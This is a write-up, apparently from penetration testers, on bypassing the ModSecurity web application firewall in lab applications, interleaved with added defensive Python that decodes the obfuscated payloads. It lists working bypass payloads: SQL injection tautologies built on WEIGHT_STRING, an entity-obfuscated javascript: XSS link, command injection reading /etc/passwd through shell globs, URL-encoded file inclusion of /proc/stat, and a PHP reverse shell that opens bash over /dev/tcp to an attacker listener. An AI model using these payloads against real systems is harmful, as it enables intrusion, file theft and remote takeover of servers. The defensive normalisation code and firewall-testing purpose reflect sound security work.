How we defeated libModSecurity aka ModSecurity

1-SQL Injection

Bypassing a WAF usually depends on the front-end/back-end architecture. We were able to perform SQL injections by using some underrated (at least in the context of injections) MySQL functions: WEIGHT_STRING is not one of the function names the WAF looks for, so a tautology built on it passes where a plain 1=1 does not.
It's worth saying that before trying to bypass a WAF, it's important to learn as much as possible about every technological building block used by the application being assessed (database engine, framework, sanitizer), since the payloads below only work against a MySQL back end.

1'+or++1+--+
11'+or++WEIGHT_STRING(@@version)=WEIGHT_STRING(@@version)+--+
admin'or 1=1; --
admin';

2-XSS

We fuzzed as much as we could and no working payload came up for DVWA, but interestingly, Juice Shop, which uses sanitize-html, helped us a bit by mutating our payload into something that works.

"</eeeee><<d<<<<<</eee>a href=<X sAAAAkkkk>jav&#x09;asc&#x09;ript&#x09&#x09&#x0A;&#x3a;alert(0912);>xssmeplease"
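The link target in that payload only becomes javascript: after two decoding steps the WAF never performs: the HTML parser turns the character references (with or without a trailing semicolon) into tab, newline and colon characters, and the URL parser then removes every tab and newline before reading the scheme. The following Python is an added example, not code from the post; it reproduces both steps on the obfuscated fragment of the payload above and shows that a naive javascript: signature on the raw attribute value misses what the browser ends up navigating to. The function names are ours.

```python
import html
import re

# The obfuscated link target taken from the payload above: the scheme is
# split by encoded tabs and a newline, and the colon is itself encoded.
OBFUSCATED_HREF = "jav&#x09;asc&#x09;ript&#x09&#x09&#x0A;&#x3a;alert(0912);"

# Characters the WHATWG URL parser removes anywhere in its input ...
_REMOVED_ANYWHERE = "\t\n\r"
# ... and the range it trims from both ends (C0 controls and space).
_TRIMMED_AT_ENDS = "".join(chr(c) for c in range(0x21))
_SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")


def naive_match(attr_value: str) -> bool:
    """What a signature on the raw input sees: does 'javascript:' appear literally?"""
    return re.search(r"javascript:", attr_value, re.IGNORECASE) is not None


def resolve_href(attr_value: str) -> str:
    """Return the URL a browser would navigate to for this href attribute value.

    Step 1 mirrors the HTML parser: character references in an attribute
    value are decoded; html.unescape, like browsers, accepts numeric
    references that lack the trailing ';'.
    Steps 2 and 3 mirror the URL parser: leading/trailing C0 controls and
    spaces are trimmed, then every ASCII tab, LF and CR is removed.
    """
    decoded = html.unescape(attr_value)
    decoded = decoded.strip(_TRIMMED_AT_ENDS)
    return "".join(ch for ch in decoded if ch not in _REMOVED_ANYWHERE)


def url_scheme(url: str) -> str:
    """Lower-cased scheme of a URL, or '' when the string has no scheme."""
    m = _SCHEME_RE.match(url)
    return m.group(1).lower() if m else ""


def is_script_url(attr_value: str) -> bool:
    """True when the href resolves to a javascript: URL after decoding."""
    return url_scheme(resolve_href(attr_value)) == "javascript"


if __name__ == "__main__":
    print(naive_match(OBFUSCATED_HREF))    # False: the signature misses it
    print(resolve_href(OBFUSCATED_HREF))   # javascript:alert(0912);
    print(is_script_url(OBFUSCATED_HREF))  # True
```

The practical consequence is that any check on link targets has to run on the decoded value, as resolve_href does, rather than on the bytes the WAF receives; running the block prints False, then the decoded javascript: URL, then True.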

3-Command Injection

Unsurprisingly, the default injection payload we tried first was blocked:

; ls -al

We then fuzzed the byte following the semicolon (;%xx for every value of xx), which turned up a variant that got through:

;) ls -al

Bypassing /etc/passwd filter

Injecting a command is nice, but if the WAF blocks our attempts to read files it becomes less fun. Based on what we had found, we first tried to read /etc/passwd with ;)cat /etc/passwd, which was blocked because the literal path is matched. Combining our bypass with an old trick, shell wildcard expansion (the shell expands the ? globs against the real filesystem before cat runs, so the WAF never sees the string /etc/passwd), worked:

;)cat /e?c/p?sswd

4-Local file inclusion

LFI was quite easy; the WAF doesn't seem to care about many files. Even with OWASP CRS paranoia level 2 enabled, you can include almost everything, for example /proc/stat with the slashes URL-encoded:

%2fproc%2fstat
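Both the ;)cat /e?c/p?sswd bypass above and the %2fproc%2fstat inclusion get past a check that looks for literal file names, because the file name only exists after the back end has URL-decoded the parameter and, in the command-injection case, after the shell has expanded the glob. The following Python is an added example, not code from the post or from ModSecurity; it decodes a parameter the way the application will see it and then matches every path-like word against a list of sensitive files with fnmatch, so that glob obfuscation and URL encoding are both resolved before the comparison. The list of files and the function names are our own assumptions.

```python
import fnmatch
import re
from urllib.parse import unquote_plus

# Constructed list of files an operator would not want readable through a
# command or file-inclusion parameter (an assumption, not from the post).
SENSITIVE_FILES = [
    "/etc/passwd",
    "/etc/shadow",
    "/proc/stat",
    "/proc/self/environ",
]

# Whitespace and shell metacharacters that separate words on a command line.
_WORD_SPLIT_RE = re.compile(r"[\s;|&(){}<>`]+")


def decode_parameter(value: str, rounds: int = 3) -> str:
    """URL-decode a parameter value the way the application will see it.

    Decoding is repeated a bounded number of times because a framework or
    back end may decode more than once (%252f -> %2f -> /). '+' is treated
    as a space, as in form bodies and query strings.
    """
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def sensitive_paths_referenced(value: str) -> list:
    """Return the sensitive files a decoded parameter could resolve to.

    Each word containing a '/' is used as a pattern against the list: a
    plain path (the LFI case) matches itself, while shell glob syntax such
    as /e?c/p?sswd, /etc/pass* or /etc/[p]asswd is expanded by fnmatch the
    way the shell expands it on the real filesystem. fnmatch's '*' also
    crosses '/', a harmless over-approximation for a detector.
    """
    decoded = decode_parameter(value)
    hits = []
    for word in _WORD_SPLIT_RE.split(decoded):
        if "/" not in word:
            continue
        for path in SENSITIVE_FILES:
            if fnmatch.fnmatchcase(path, word) and path not in hits:
                hits.append(path)
    return hits


if __name__ == "__main__":
    for sample in (";)cat /e?c/p?sswd", "%2fproc%2fstat",
                   "%252fetc%252fpasswd", "; ls -al"):
        print(repr(sample), "->", sensitive_paths_referenced(sample))
```

The same normalisation applies to any deny-list check: decode first, then compare on the form the back end will act on; a rule that compares the raw bytes against /etc/passwd is what the two bypasses in this section exploit.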

5-Unrestricted File Upload

Flaws in file upload restrictions are always fun because they end up in easy shells. Modsec was (thankfully for us) not able to block even a very basic PHP reverse shell, uploaded as examples.php with the following content (192.168.136.133:4444 being our listener):

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.136.133/4444 0>&1'"); ?>

We popped a shell.

Conclusion

This research was not very serious, and we found every single bypass in less than 20 hours of work. Unless you are willing to push the CRS paranoia level to 4 and have the time and energy to deal with a very high number of false positives, we clearly do not advise relying on Modsec to protect anything critical.
